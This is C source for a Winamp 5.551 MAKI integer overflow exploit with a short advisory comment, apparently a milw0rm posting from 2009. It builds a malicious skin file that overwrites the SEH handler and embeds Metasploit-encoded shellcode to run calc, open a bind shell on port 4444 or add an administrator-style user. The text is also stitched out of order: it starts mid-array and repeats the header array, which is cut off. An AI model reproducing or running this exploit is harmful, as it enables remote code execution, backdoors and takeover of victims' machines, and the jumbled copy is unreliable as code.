0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
/*Trigger the Integer overflow*/
unsigned char Exception [] =
{
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF
};
/* win32_exec - EXITFUNC=seh CMD=Calc Size=343
Encoder=PexAlphaNum http://metasploit.com */
char Calc_ShellCode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x37\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x34\x41\x36"
"\x4e\x46\x43\x36\x42\x50\x5a";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=709
Encoder=PexAlphaNum http://metasploit.com */
char Bind_Shellcode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
"\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x48\x43\x34\x42\x33\x4b\x48\x42\x44\x4e\x30\x4b\x48"
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
"\x43\x45\x48\x36\x4a\x36\x43\x53\x44\x53\x4a\x56\x47\x57\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x55\x43\x55\x43\x54"
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
"\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x49\x4a\x36"
"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x46\x48\x36\x4a\x56\x43\x46"
"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x42"
"\x43\x39\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
"\x41\x30\x41\x35\x41\x45\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";
/* win32_adduser - PASS=n00b EXITFUNC=seh USER=n00b Size=489
Encoder=PexAlphaNum http://metasploit.com */
char Add_User_Shellcode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"
"\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
"\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"
"\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"
"\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"
"\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"
"\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"
"\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"
"\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"
"\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"
"\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"
"\x41\x44\x46\x44\x46\x44\x42\x30\x5a";
unsigned char Junk1 ='A';
int main()
{
FILE *fp;
int i;
if ((fp = fopen(MAKI, "wb")) == NULL)
{
printf("File %s write error\n", MAKI);
return(0);
}
for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Exception); i++)
fputc(Exception[i], fp);
for (i=0;i<16751;i++)
{
fwrite(&Junk1,1,1,fp);
}
fputs("\xeb\x06\x90\x90",fp);/*Pointer to next seh record */
fputs("\x7C\x14\xF0\x12",fp);/*SE handler Universal adress 12F0147C */
int input;
printf("\n------------------------------------------------------");
printf("\nWinamp 5.551 MAKI Parsing Integer Overflow Exploit !!!");
printf("\n\nExploit created by n00b");
printf( "\n[1]. Calc Shell_Code" );
printf( "\n[2]. Bind Shell_Code on port 4444" );
printf( "\n[3]. Add user Shell_Code" );
printf( "\n[4]. To exit and cancel" );
printf( "\nPlease chose your Shell_Code:" );
scanf( "%d", &input );
switch ( input )
{
case 1:
for (i=0; i<sizeof(Calc_ShellCode); i++)
fputc(Calc_ShellCode[i], fp);
break;
case 2:
for (i=0; i<sizeof(Bind_Shellcode); i++)
fputc(Bind_Shellcode[i], fp);
break;
case 3:
for (i=0; i<sizeof(Add_User_Shellcode); i++)
fputc(Add_User_Shellcode[i], fp);
break;
case 4:
return 0;
break;
}
fclose(fp);
return 0;
}
// milw0rm.com [2009-05-26]
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552
Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3 <eng>
<Vista sp1> And all worked fine.
I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!
Below i have provided a look into the disassembly of the new
changes in the 555.2 version of winamp the main change was in
gen_ff.dll.
---snip--
A quick look at the new gen_ff.dll.
----------------------------------
loc_12094F62:
mov ax, [ebx]
movzx edi, ax -Extends ax into edi register.-
inc ebx
push edi ; Size
inc ebx
lea eax, [ebp+MultiByteStr]
push ebx ; Src
push eax ; Dst
call memmove
------------------------
loc_120951E9:
mov edi, [ebx]
add ebx, 4
mov ax, [ebx]
movzx esi, ax -Extends ax into esi register.-
inc ebx
push esi ; Size
inc ebx
lea eax, [ebp+var_2014C] <-- This was also changed.
push ebx ; Src
push eax ; Dst
call memmove
This is a simple run down of the new patch
that was applied to winamp winamp 5.552 If we look closely we can see they
changed the sign extension.
=555.1 .dll=
----------
movsx esi, ax = movsx(dest , source );
Copies source operand dest and extends the value.
Changed in the new gen_ff.dll.
=555.2 .dll=
----------
movzx esi, ax
Zero extend the 8 bit registers.
Copies data and sign extends the data while copying it.
Destination= 16 - 32 bit.
Source = 8 or a 16byte or maybe even 1 byte of memory
Source = the destination must be of greater value than the source.
This was a few of the changes within the new dll from winamp.Im
sure if you want to dig deeper you can get both dll and compare them
to see the changes that are made.So basically they have changed the
instruction from Copy with sign extension to copy with zero extension.
This can also be displayed when looking at the stack at the time of the
exception in the new version of winamp after steeping through the exception
although we can cause and exception we cant overwrite the 4 bytes on the
stack we can only overwrite 2 and it is always capped with 00FF.
---snip--
Special thanks to str0ke :)
Credits to n00b for writing exploit code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
***************************************************************/
#include <stdio.h>
#define MAKI "mcvcore.maki"
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
